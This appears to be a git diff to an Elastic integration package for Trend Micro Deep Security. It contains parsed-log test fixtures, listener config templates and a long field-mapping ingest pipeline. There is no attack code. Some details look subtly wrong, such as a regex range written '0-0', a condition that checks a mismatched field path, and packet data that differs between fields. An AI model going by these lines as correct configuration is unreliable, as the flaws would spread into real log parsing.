[ + "System" + ] + }, "source": { "ip": "192.168.1.20", "user": { @@ -82,16 +107,31 @@ } }, "tags": [ - "preserve_original_event" + "preserve_original_event", + "preserve_duplicate_custom_fields" ], "trendmicro": { - "event": { - "category": "system", + "deep_security": { + "device": { + "product": "Deep Security Manager", + "vendor": "Trend Micro", + "version": "12.0.327" + }, + "event_category": "system-event", + "event_class_id": "190", "message": "Alert: Memory Critical Threshold Exceeded\\nSubject: 192.168.1.20\\nSeverity: Critical", "name": "Alert Started", + "severity": 3, "signature_id": 190, - "tenant_id": "0", - "tenant_name": "Primary" + "source": { + "address": "192.168.1.20", + "user_name": "System" + }, + "trendmicro": { + "ds_tenant": "Primary", + "ds_tenant_id": "0" + }, + "version": "0" } } }, @@ -101,27 +141,31 @@ "version": "8.11.0" }, "event": { - "category": [ - "malware", - "threat" - ], + "action": "agent-appliance-error", "code": "740", + "kind": "event", "original": "<190>2021-10-09T01:54:56-07:00 192.168.1.20 CEF:0|Trend Micro|Deep Security Manager|12.0.327|740|Agent/Appliance Error|8|src=192.168.1.20 suser=System target=SMC-NewAPP (192.168.1.61) msg=The Agent/Appliance reported one or more warnings or errors. Details are found in the Agent/Appliance events listed below. TrendMicroDsTenant=Primary TrendMicroDsTenantId=0", - "severity": 8, - "type": [ - "info" - ] + "severity": 8 }, "log": { "syslog": { "priority": 190 } }, + "message": "The Agent/Appliance reported one or more warnings or errors. Details are found in the Agent/Appliance events listed below.", "observer": { "product": "Deep Security Manager", "vendor": "Trend Micro", "version": "12.0.327" }, + "related": { + "ip": [ + "192.168.1.20" + ], + "user": [ + "System" + ] + }, "source": { "ip": "192.168.1.20", "user": { @@ -129,17 +173,318 @@ } }, "tags": [ - "preserve_original_event" + "preserve_original_event", + "preserve_duplicate_custom_fields" ], "trendmicro": { - "event": { - "category": "system", + "deep_security": { + "device": { + "product": "Deep Security Manager", + "vendor": "Trend Micro", + "version": "12.0.327" + }, + "event_category": "system-event", + "event_class_id": "740", "message": "The Agent/Appliance reported one or more warnings or errors. Details are found in the Agent/Appliance events listed below.", "name": "Agent/Appliance Error", + "severity": 8, "signature_id": 740, - "target": "SMC-NewAPP (192.168.1.61)", - "tenant_id": "0", - "tenant_name": "Primary" + "source": { + "address": "192.168.1.20", + "user_name": "System" + }, + "target": { + "value": "SMC-NewAPP (192.168.1.61)" + }, + "trendmicro": { + "ds_tenant": "Primary", + "ds_tenant_id": "0" + }, + "version": "0" + } + } + }, + { + "@timestamp": "2024-01-19T13:36:47.000Z", + "destination": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144", + "mac": "11-AA-00-00-AA-00", + "port": 65535 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "reset", + "category": [ + "intrusion_detection" + ], + "code": "1001251", + "kind": "event", + "original": "<190>Jan 19 13:36:47 2K19-va CEF:0|Trend Micro|Deep Security Agent|20.0.1.690|1001251|Disallow Web Proxy Autodiscovery Protocol|6|cn1=4 cn1Label=Host ID dvchost=2K19-va.test.local TrendMicroDsTenant=814726098539 TrendMicroDsTenantId=16005 dmac=11-AA-00-00-AA-00 smac=00-BB-00-00-BB-00 TrendMicroDsFrameType=IP src=216.160.83.56 dst=81.2.69.144 in=150 proto=UDP spt=53 dpt=65535 cnt=1 act=Reset cn3=16 cn3Label=DPI Packet Position cs5=16 cs5Label=DPI Stream Position cs1=CVE-2007-5355 cs1Label=DPI Note cs6=8 cs6Label=DPI Flags TrendMicroDsPacketData=PUaBgwABAAAAAQAABHdwYWQEdGVzdAVsb2NhbAAAAQABAAAGAAEAAVF5AEABYQxyb290LXNlcnZlcnMDbmV0AAVuc3RsZAx2ZXJpc2lnbi1ncnMDY29tAHij+HwAAAcIAAADhAAJOoAAAVGA", + "severity": 6, + "type": [ + "info" + ] + }, + "host": { + "id": "4" + }, + "log": { + "syslog": { + "priority": 190 + } + }, + "message": "Disallow Web Proxy Autodiscovery Protocol", + "network": { + "community_id": "1:TJGLD3dNqhqQdTNdSwivLmyc8vs=", + "transport": "udp" + }, + "observer": { + "hostname": "2K19-va.test.local", + "product": "Deep Security Agent", + "vendor": "Trend Micro", + "version": "20.0.1.690" + }, + "related": { + "hosts": [ + "4" + ], + "ip": [ + "81.2.69.144", + "216.160.83.56" + ] + }, + "source": { + "bytes": 150, + "geo": { + "city_name": "Milton", + "continent_name": "North America", + "country_iso_code": "US", + "country_name": "United States", + "location": { + "lat": 47.2513, + "lon": -122.3149 + }, + "region_iso_code": "US-WA", + "region_name": "Washington" + }, + "ip": "216.160.83.56", + "mac": "00-BB-00-00-BB-00", + "port": 53 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "trendmicro": { + "deep_security": { + "action": "Reset", + "base_event_count": 1, + "bytes_in": 150, + "destination": { + "address": "81.2.69.144", + "mac_address": "11-AA-00-00-AA-00", + "port": 65535 + }, + "device": { + "custom_number1": { + "label": "Host ID", + "value": "4" + }, + "custom_number3": { + "label": "DPI Packet Position", + "value": 16 + }, + "custom_string1": { + "label": "DPI Note", + "value": "CVE-2007-5355" + }, + "custom_string5": { + "label": "DPI Stream Position", + "value": "16" + }, + "custom_string6": { + "label": "DPI Flags", + "value": "8" + }, + "product": "Deep Security Agent", + "vendor": "Trend Micro", + "version": "20.0.1.690" + }, + "deviceHostName": "2K19-va.test.local", + "event_category": "intrusion-prevention-event", + "event_class_id": "1001251", + "name": "Disallow Web Proxy Autodiscovery Protocol", + "severity": 6, + "signature_id": 1001251, + "source": { + "address": "216.160.83.56", + "mac_address": "00-BB-00-00-BB-00", + "port": 53 + }, + "transport_protocol": "UDP", + "trendmicro": { + "ds_frame_type": "IP", + "ds_packet_data": "PUaBgwAAAAAQAABHdwYWQEdGVzdAVsb2NhbAAAAQABAAAGAAEAAVF5AEABYQxyb290LXNlcnZlcnMDbmV0AAVuc3RsZAx2ZXJpc2lnbi1ncnMDY29tAHij+HwAAAcIAAADhAAJOoAAAVGA", + "ds_tenant": "814726098539", + "ds_tenant_id": "16005" + }, + "version": "0" + } + } + }, + { + "@timestamp": "2024-01-19T13:36:47.000Z", + "destination": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144", + "mac": "11-AA-00-00-AA-00", + "port": 65535 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "reset", + "category": [ + "malware" + ], + "code": "4000001", + "kind": "alert", + "original": "<190>Jan 19 13:36:47 2K19-va CEF:0|Trend Micro|Deep Security Agent|20.0.1.690|1001251|Disallow Web Proxy Autodiscovery Protocol|6|cn1=4 cn1Label=Host ID dvchost=2K19-va.test.local TrendMicroDsTenant=814726098539 TrendMicroDsTenantId=16005 dmac=11-AA-00-00-AA-00 smac=00-BB-00-00-BB-00 TrendMicroDsFrameType=IP src=216.160.83.56 dst=81.2.69.144 in=150 proto=UDP spt=53 dpt=65535 cnt=1 act=Reset cn3=16 cn3Label=DPI Packet Position cs5=16 cs5Label=DPI Stream Position cs1=CVE-2007-5355 cs1Label=DPI Note cs6=8 cs6Label=DPI Flags TrendMicroDsPacketData=PUaBgwABAAAAAQAABHdwYWQEdGVzdAVsb2NhbAAAAQABAAAGAAEAAVF5AEABYQxyb290LXNlcnZlcnMDbmV0AAVuc3RsZAx2ZXJpc2lnbi1ncnMDY29tAHij+HwAAAcIAAADhAAJOoAAAVGA", + "severity": 6, + "type": [ + "info" + ] + }, + "host": { + "id": "4" + }, + "log": { + "syslog": { + "priority": 190 + } + }, + "message": "Disallow Web Proxy Autodiscovery Protocol", + "network": { + "community_id": "1:TJGLD3dNqhqQdTNdSwivLmyc8vs=", + "transport": "udp" + }, + "observer": { + "hostname": "2K19-va.test.local", + "product": "Deep Security Agent", + "vendor": "Trend Micro", + "version": "20.0.1.690" + }, + "related": { + "hosts": [ + "4" + ], + "ip": [ + "81.2.69.144", + "216.160.83.56" + ] + }, + "source": { + "bytes": 150, + "geo": { + "city_name": "Milton", + "continent_name": "North America", + "country_iso_code": "US", + "country_name": "United States", + "location": { + "lat": 47.2513, + "lon": -122.3149 + }, + "region_iso_code": "US-WA", + "region_name": "Washington" + }, + "ip": "216.160.83.56", + "mac": "00-BB-00-00-BB-00", + "port": 53 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "trendmicro": { + "deep_security": { + "action": "Reset", + "base_event_count": 1, + "bytes_in": 150, + "destination": { + "address": "81.2.69.144", + "mac_address": "11-AA-00-00-AA-00", + "port": 65535 + }, + "device": { + "custom_number1": { + "label": "Host ID", + "value": "4" + }, + "custom_number3": { + "label": "DPI Packet Position", + "value": 16 + }, + "custom_string1": { + "label": "DPI Note", + "value": "CVE-2007-5355" + }, + "custom_string5": { + "label": "DPI Stream Position", + "value": "16" + }, + "custom_string6": { + "label": "DPI Flags", + "value": "8" + }, + "product": "Deep Security Agent", + "vendor": "Trend Micro", + "version": "20.0.1.690" + }, + "deviceHostName": "2K19-va.test.local", + "event_category": "anti-malware-event", + "event_class_id": "4000001", + "name": "Disallow Web Proxy Autodiscovery Protocol", + "severity": 6, + "signature_id": 4000001, + "source": { + "address": "216.160.83.56", + "mac_address": "00-BB-00-00-BB-00", + "port": 53 + }, + "transport_protocol": "UDP", + "trendmicro": { + "ds_frame_type": "IP", + "ds_packet_data": "PUaBgwAAAAAQAABHdwYWQEdGVzdAVsb2NhbAAAAQABAAAGAAEAAVF5AEABYQxyb290LXNlcnZlcnMDbmV0AAVuc3RsZAx2ZXJpc2lnbi1ncnMDY29tAHij+HwAAAcIAAADhAAJOoAAAVGA", + "ds_tenant": "814726098539", + "ds_tenant_id": "16005" + }, + "version": "0" } } } diff --git a/packages/trendmicro/data_stream/deep_security/_dev/test/system/test-tcp-config.yml b/packages/trendmicro/data_stream/deep_security/_dev/test/system/test-tcp-config.yml index 595a6d18b39..c47d17cd076 100644 --- a/packages/trendmicro/data_stream/deep_security/_dev/test/system/test-tcp-config.yml +++ b/packages/trendmicro/data_stream/deep_security/_dev/test/system/test-tcp-config.yml @@ -3,10 +3,10 @@ service_notify_signal: SIGHUP input: tcp data_stream: vars: - tcp_host: 0.0.0.0 - tcp_port: 9514 + listen_address: 0.0.0.0 + listen_port: 9514 preserve_original_event: true - decode_trendmicro_timezone: UTC + tz_offset: UTC numeric_keyword_fields: - log.file.device_id - log.file.inode diff --git a/packages/trendmicro/data_stream/deep_security/_dev/test/system/test-tls-config.yml b/packages/trendmicro/data_stream/deep_security/_dev/test/system/test-tls-config.yml index fd82b0aff73..7b5b0d8f357 100644 --- a/packages/trendmicro/data_stream/deep_security/_dev/test/system/test-tls-config.yml +++ b/packages/trendmicro/data_stream/deep_security/_dev/test/system/test-tls-config.yml @@ -3,10 +3,10 @@ service_notify_signal: SIGHUP input: tcp data_stream: vars: - tcp_host: 0.0.0.0 - tcp_port: 9515 + listen_address: 0.0.0.0 + listen_port: 9515 preserve_original_event: true - decode_trendmicro_timezone: UTC + tz_offset: UTC ssl: | key: | -----BEGIN PRIVATE KEY----- diff --git a/packages/trendmicro/data_stream/deep_security/_dev/test/system/test-udp-config.yml b/packages/trendmicro/data_stream/deep_security/_dev/test/system/test-udp-config.yml index e1145d8ec57..bab5e73e6a2 100644 --- a/packages/trendmicro/data_stream/deep_security/_dev/test/system/test-udp-config.yml +++ b/packages/trendmicro/data_stream/deep_security/_dev/test/system/test-udp-config.yml @@ -3,10 +3,10 @@ service_notify_signal: SIGHUP input: udp data_stream: vars: - udp_host: 0.0.0.0 - udp_port: 9515 + listen_address: 0.0.0.0 + listen_port: 9515 preserve_original_event: true - decode_trendmicro_timezone: UTC + tz_offset: UTC numeric_keyword_fields: - log.file.device_id - log.file.inode diff --git a/packages/trendmicro/data_stream/deep_security/agent/stream/stream.yml.hbs b/packages/trendmicro/data_stream/deep_security/agent/stream/filestream.yml.hbs similarity index 59% rename from packages/trendmicro/data_stream/deep_security/agent/stream/stream.yml.hbs rename to packages/trendmicro/data_stream/deep_security/agent/stream/filestream.yml.hbs index 55a56f82946..3117c8e5b12 100644 --- a/packages/trendmicro/data_stream/deep_security/agent/stream/stream.yml.hbs +++ b/packages/trendmicro/data_stream/deep_security/agent/stream/filestream.yml.hbs @@ -1,12 +1,15 @@ paths: - {{#each paths as |path i|}} -- {{path}} - {{/each}} -exclude_files: ['\.gz$'] +{{#each paths as |path|}} + - {{path}} +{{/each}} +exclude_files: [".gz$"] tags: {{#if preserve_original_event}} - preserve_original_event {{/if}} +{{#if preserve_duplicate_custom_fields}} + - preserve_duplicate_custom_fields +{{/if}} {{#each tags as |tag|}} - {{tag}} {{/each}} @@ -19,9 +22,12 @@ processors: - {from: "message", to: "event.original"} - decode_cef: field: event.original -{{#if decode_trendmicro_timezone}} - timezone: {{ decode_trendmicro_timezone }} +{{#if tz_offset}} +fields_under_root: true +fields: + _conf: + tz_offset: {{tz_offset}} {{/if}} {{#if processors}} {{processors}} -{{/if}} \ No newline at end of file +{{/if}} diff --git a/packages/trendmicro/data_stream/deep_security/agent/stream/tcp.yml.hbs b/packages/trendmicro/data_stream/deep_security/agent/stream/tcp.yml.hbs index b23af84b371..573f782b358 100644 --- a/packages/trendmicro/data_stream/deep_security/agent/stream/tcp.yml.hbs +++ b/packages/trendmicro/data_stream/deep_security/agent/stream/tcp.yml.hbs @@ -1,4 +1,7 @@ -host: "{{tcp_host}}:{{tcp_port}}" +host: "{{listen_address}}:{{listen_port}}" +{{#if tcp_options}} +{{tcp_options}} +{{/if}} {{#if ssl}} ssl: {{ssl}} {{/if}} @@ -6,6 +9,9 @@ tags: {{#if preserve_original_event}} - preserve_original_event {{/if}} +{{#if preserve_duplicate_custom_fields}} + - preserve_duplicate_custom_fields +{{/if}} {{#each tags as |tag|}} - {{tag}} {{/each}} @@ -18,9 +24,12 @@ processors: - {from: "message", to: "event.original"} - decode_cef: field: event.original -{{#if decode_trendmicro_timezone}} - timezone: {{ decode_trendmicro_timezone }} +{{#if tz_offset}} +fields_under_root: true +fields: + _conf: + tz_offset: {{tz_offset}} {{/if}} {{#if processors}} {{processors}} -{{/if}} \ No newline at end of file +{{/if}} diff --git a/packages/trendmicro/data_stream/deep_security/agent/stream/udp.yml.hbs b/packages/trendmicro/data_stream/deep_security/agent/stream/udp.yml.hbs index 19f75bce816..edd2b79c54d 100644 --- a/packages/trendmicro/data_stream/deep_security/agent/stream/udp.yml.hbs +++ b/packages/trendmicro/data_stream/deep_security/agent/stream/udp.yml.hbs @@ -1,8 +1,14 @@ -host: "{{udp_host}}:{{udp_port}}" +host: "{{listen_address}}:{{listen_port}}" +{{#if udp_options}} +{{udp_options}} +{{/if}} tags: {{#if preserve_original_event}} - preserve_original_event {{/if}} +{{#if preserve_duplicate_custom_fields}} + - preserve_duplicate_custom_fields +{{/if}} {{#each tags as |tag|}} - {{tag}} {{/each}} @@ -15,9 +21,12 @@ processors: - {from: "message", to: "event.original"} - decode_cef: field: event.original -{{#if decode_trendmicro_timezone}} - timezone: {{ decode_trendmicro_timezone }} +{{#if tz_offset}} +fields_under_root: true +fields: + _conf: + tz_offset: {{tz_offset}} {{/if}} {{#if processors}} {{processors}} -{{/if}} \ No newline at end of file +{{/if}} diff --git a/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/application-control-event.yml b/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/application-control-event.yml index 74c536dd8ce..f6159387ed4 100644 --- a/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/application-control-event.yml +++ b/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/application-control-event.yml @@ -1,100 +1,42 @@ --- -description: Pipeline for processing Application Control event logs +description: Pipeline for processing Application Control event logs. processors: - set: - field: trendmicro.event.category - value: "app-control" - - set: + field: trendmicro.deep_security.event_category + tag: set_deep_security_event_category + value: application-control-event + - append: field: event.category - value: [intrusion_detection,package] + tag: set_event_category + value: intrusion_detection + allow_duplicates: false - append: field: event.type + tag: set_event_type value: info allow_duplicates: false - append: field: event.type + tag: set_event_type value: denied allow_duplicates: false - if: ctx.trendmicro?.event?.signature_id != null && !['6002100','6002200'].contains(ctx.trendmicro.event.signature_id) - - - script: - lang: painless - params: - extensions: - # Rename field - - name: deviceCustomNumber1 - to: host.id - - name: deviceCustomString1 - to: trendmicro.event.action_reason - - name: deviceCustomString3 - to: file.hash.md5 - - name: deviceCustomString2 - to: file.hash.sha1 - - name: fileHash - to: file.hash.sha256 - - name: deviceAddress - to: host.ip - - name: deviceHostName - to: host.hostname - - name: TrendMicroDsTags - to: trendmicro.event.tags - - name: TrendMicroDsTenantId - to: trendmicro.event.tenant_id - - name: TrendMicroDsTenant - to: trendmicro.event.tenant_name - - name: aggregationType - to: trendmicro.event.aggregation_type - convert: - "0": The event is not aggregated - "1": The event is aggregated based on file name,path,and event type - "2": The event is aggregated based on event type - - name: repeatCount - to: trendmicro.event.count - - source: | - def actions = new ArrayList(); - def exts = ctx.cef?.extensions; - if (exts == null) return; - for (entry in params.extensions) { - def value = exts[entry.name]; - if (value == null || - (entry.convert != null && - (value=entry.convert[value.toLowerCase()]) == null)) - continue; - if (entry.to != null) { - actions.add([ - "value": value, - "to": entry.to - ]); - continue; - } - def label = exts[entry.name + "Label"]; - if (label == null) continue; - def dest = entry.labels[label.toLowerCase()]; - if (dest == null) continue; - actions.add([ - "value": value, - "to": dest - ]); - } - ctx["_tmp_copy"] = actions; - - foreach: - field: _tmp_copy - processor: - set: - field: "{{_ingest._value.to}}" - value: "{{_ingest._value.value}}" - ignore_empty_value: true - - - remove: - field: - - _tmp_copy - ignore_missing: true - + if: ctx.trendmicro?.deep_security?.signature_id != null && ctx.trendmicro.deep_security.signature_id != 6002100 && ctx.trendmicro.deep_security.signature_id != 6002200 + - append: + field: related.hash + tag: append_cs2_value_to_related_hash + value: '{{{trendmicro.deep_security.extensions.device.custom_string2.value}}}' + allow_duplicates: false + if: ctx.trendmicro?.deep_security?.extensions?.device?.custom_string2?.value != null + - append: + field: related.hash + tag: append_cs3_value_to_related_hash + value: '{{{trendmicro.deep_security.extensions.device.custom_string3.value}}}' + allow_duplicates: false + if: ctx.trendmicro?.deep_security?.extensions?.device?.custom_string3?.value != null on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - set: field: event.kind value: pipeline_error - - append: - field: error.message - value: '{{{ _ingest.on_failure_message }}}' diff --git a/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/default.yml b/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/default.yml index 15f81b30da6..9c4fd8ba613 100644 --- a/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/default.yml +++ b/packages/trendmicro/data_stream/deep_security/elasticsearch/ingest_pipeline/default.yml @@ -1,81 +1,860 @@ --- -description: Pipeline for trendmicro deep security logs. - +description: Pipeline for processing Deep Security logs. processors: - set: field: ecs.version - value: "8.11.0" + tag: set_ecs_version + value: 8.11.0 - set: - field: trendmicro.event.signature_id - value: "{{{event.code}}}" + field: event.kind + tag: set_event_kind + value: event + - rename: + field: cef.device.event_class_id + tag: rename_device_event_class_id + target_field: trendmicro.deep_security.event_class_id + ignore_missing: true + - set: + field: event.code + tag: set_event_code_from_deep_security_device_event_class_id + copy_from: trendmicro.deep_security.event_class_id + ignore_empty_value: true + - convert: + field: event.code + tag: convert_event_code + target_field: trendmicro.deep_security.signature_id + type: long + ignore_missing: true + if: ctx.event?.code != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: event.action + tag: set_default_event_action_from_event_name + copy_from: cef.name + ignore_empty_value: true + - gsub: + field: event.action + pattern: '[^a-zA-Z0-0]' + replacement: ' ' + if: ctx.event?.action != null + - rename: + field: cef.device.product + tag: rename_cef_device_product + target_field: trendmicro.deep_security.device.product + ignore_missing: true + - set: + field: observer.product + tag: set_observer_product_from_deep_security_device_product + copy_from: trendmicro.deep_security.device.product + ignore_empty_value: true + - rename: + field: cef.device.vendor + tag: rename_cef_device_vendor + target_field: trendmicro.deep_security.device.vendor + ignore_missing: true + - set: + field: observer.vendor + tag: set_observer_vendor_from_deep_security_device_vendor + copy_from: trendmicro.deep_security.device.vendor + ignore_empty_value: true + - rename: + field: cef.device.version + tag: rename_cef_device_version + target_field: trendmicro.deep_security.device.version + ignore_missing: true + - set: + field: observer.version + tag: set_observer_version_from_deep_security_device_version + copy_from: trendmicro.deep_security.device.version + ignore_empty_value: true + - convert: + field: cef.extensions.baseEventCount + tag: convert_cef_extensions_baseEventCount_to_long + target_field: trendmicro.deep_security.base_event_count + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: cef.extensions.bytesIn + tag: convert_cef_extensions_bytesIn_to_long + target_field: trendmicro.deep_security.bytes_in + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.bytes + tag: set_source_bytes_from_deep_security_bytes_in + copy_from: trendmicro.deep_security.bytes_in + ignore_empty_value: true + - convert: + field: cef.extensions.destinationAddress + tag: convert_cef_extensions_destinationAddress_to_ip + target_field: trendmicro.deep_security.destination.address + type: ip + ignore_missing: true + if: ctx.cef?.extensions?.destinationAddress != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: destination.ip + tag: set_destination_ip_from_deep_security_destination_address + copy_from: trendmicro.deep_security.destination.address + ignore_empty_value: true + - append: + field: related.ip + tag: append_destination_ip_to_related_ip + value: '{{{destination.ip}}}' + allow_duplicates: false + if: ctx.destination?.ip != null + - geoip: + field: destination.ip + tag: geoip_destination_ip + target_field: destination.geo + ignore_missing: true + - gsub: + field: cef.extensions.destinationMacAddress + tag: gsub_destinationMacAddress + target_field: trendmicro.deep_security.destination.mac_address + pattern: '[-:.]' + replacement: '-' + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - uppercase: + field: trendmicro.deep_security.destination.mac_address + tag: uppercase_destination_mac_address + ignore_missing: true + if: ctx.trendmicro?.deep_security?.extensions?.destination?.mac_address != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: destination.mac + tag: set_destination_mac_from_deep_security_destination_mac_address + copy_from: trendmicro.deep_security.destination.mac_address + ignore_empty_value: true + - convert: + field: cef.extensions.destinationPort + tag: convert_cef_extensions_destinationPort_to_long + target_field: trendmicro.deep_security.destination.port + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: destination.port + tag: set_destination_port_from_deep_security_destination_port + copy_from: trendmicro.deep_security.destination.port + ignore_empty_value: true + - rename: + field: cef.extensions.deviceAction + tag: rename_cef_extensions_deviceAction + target_field: trendmicro.deep_security.action + ignore_missing: true + - set: + field: event.action + tag: set_event_action_from_deep_security_device_action + copy_from: trendmicro.deep_security.action + ignore_empty_value: true + - lowercase: + field: event.action + tag: lowercase_event_action + ignore_missing: true + - split: + field: event.action + tag: split_event_action + separator: \s+ + ignore_missing: true + if: ctx.event?.action != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - join: + field: event.action + tag: join_event_action + separator: '-' + if: ctx.event?.action != null && ctx.event.action != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: cef.extensions.deviceCustomNumber1Label + tag: rename_cef_extensions_deviceCustomNumber1Label + target_field: trendmicro.deep_security.device.custom_number1.label + ignore_missing: true + - convert: + field: cef.extensions.deviceCustomNumber1 + tag: convert_cef_extensions_deviceCustomNumber1_to_string + target_field: trendmicro.deep_security.device.custom_number1.value + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: host.id + tag: set_host_id_from_deep_security_device_custom_number1_value + copy_from: trendmicro.deep_security.device.custom_number1.value + ignore_empty_value: true + - append: + field: related.hosts + tag: append_host_id_to_related_hosts + value: '{{{host.id}}}' + allow_duplicates: false + if: ctx.host?.id != null + - rename: + field: cef.extensions.deviceCustomNumber2Label + tag: rename_cef_extensions_deviceCustomNumber2Label + target_field: trendmicro.deep_security.device.custom_number2.label + ignore_missing: true + - convert: + field: cef.extensions.deviceCustomNumber2 + tag: convert_cef_extensions_deviceCustomNumber2_to_long + target_field: trendmicro.deep_security.device.custom_number2.value + ignore_missing: true + type: long + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: cef.extensions.deviceCustomNumber3Label + tag: rename_cef_extensions_deviceCustomNumber3Label + target_field: trendmicro.deep_security.device.custom_number3.label + ignore_missing: true + - convert: + field: cef.extensions.deviceCustomNumber3 + tag: convert_cef_extensions_deviceCustomNumber3_to_long + target_field: trendmicro.deep_security.device.custom_number3.value + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: cef.extensions.deviceCustomString1Label + tag: rename_cef_extensions_deviceCustomString1Label + target_field: trendmicro.deep_security.device.custom_string1.label + ignore_missing: true + - rename: + field: cef.extensions.deviceCustomString1 + tag: rename_cef_extensions_deviceCustomString1 + target_field: trendmicro.deep_security.device.custom_string1.value + ignore_missing: true + - rename: + field: cef.extensions.deviceCustomString2Label + tag: rename_cef_extensions_deviceCustomString2Label + target_field: trendmicro.deep_security.device.custom_string2.label + ignore_missing: true + - rename: + field: cef.extensions.deviceCustomString2 + tag: rename_cef_extensions_deviceCustomString2 + target_field: trendmicro.deep_security.device.custom_string2.value + ignore_missing: true + - rename: + field: cef.extensions.deviceCustomString3Label + tag: rename_cef_extensions_deviceCustomString3Label + target_field: trendmicro.deep_security.device.custom_string3.label + ignore_missing: true + - rename: + field: cef.extensions.deviceCustomString3 + tag: rename_cef_extensions_deviceCustomString3 + target_field: trendmicro.deep_security.device.custom_string3.value + ignore_missing: true + - rename: + field: cef.extensions.deviceCustomString4Label + tag: rename_extensions_deviceCustomString4Label + target_field: trendmicro.deep_security.device.custom_string4.label + ignore_missing: true + - rename: + field: cef.extensions.deviceCustomString4 + tag: rename_extensions_deviceCustomString4 + target_field: trendmicro.deep_security.device.custom_string4.value + ignore_missing: true + - rename: + field: cef.extensions.deviceCustomString5Label + tag: rename_cef_extensions_deviceCustomString5Label + target_field: trendmicro.deep_security.device.custom_string5.label + ignore_missing: true + - convert: + field: cef.extensions.deviceCustomString5 + tag: convert_cef_extensions_deviceCustomString5_to_string + target_field: trendmicro.deep_security.device.custom_string5.value + ignore_missing: true + type: string + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: cef.extensions.deviceCustomString6Label + tag: rename_cef_extensions_deviceCustomString6Label + target_field: trendmicro.deep_security.device.custom_string6.label + ignore_missing: true + - rename: + field: cef.extensions.deviceCustomString6 + tag: rename_cef_extensions_deviceCustomString6 + target_field: trendmicro.deep_security.device.custom_string6.value + ignore_missing: true + - rename: + field: cef.extensions.cs7Label + tag: rename_cef_extensions_cs7Label + target_field: trendmicro.deep_security.device.custom_string7.label + ignore_missing: true + - rename: + field: cef.extensions.cs7 + tag: rename_cef_extensions_cs7 + target_field: 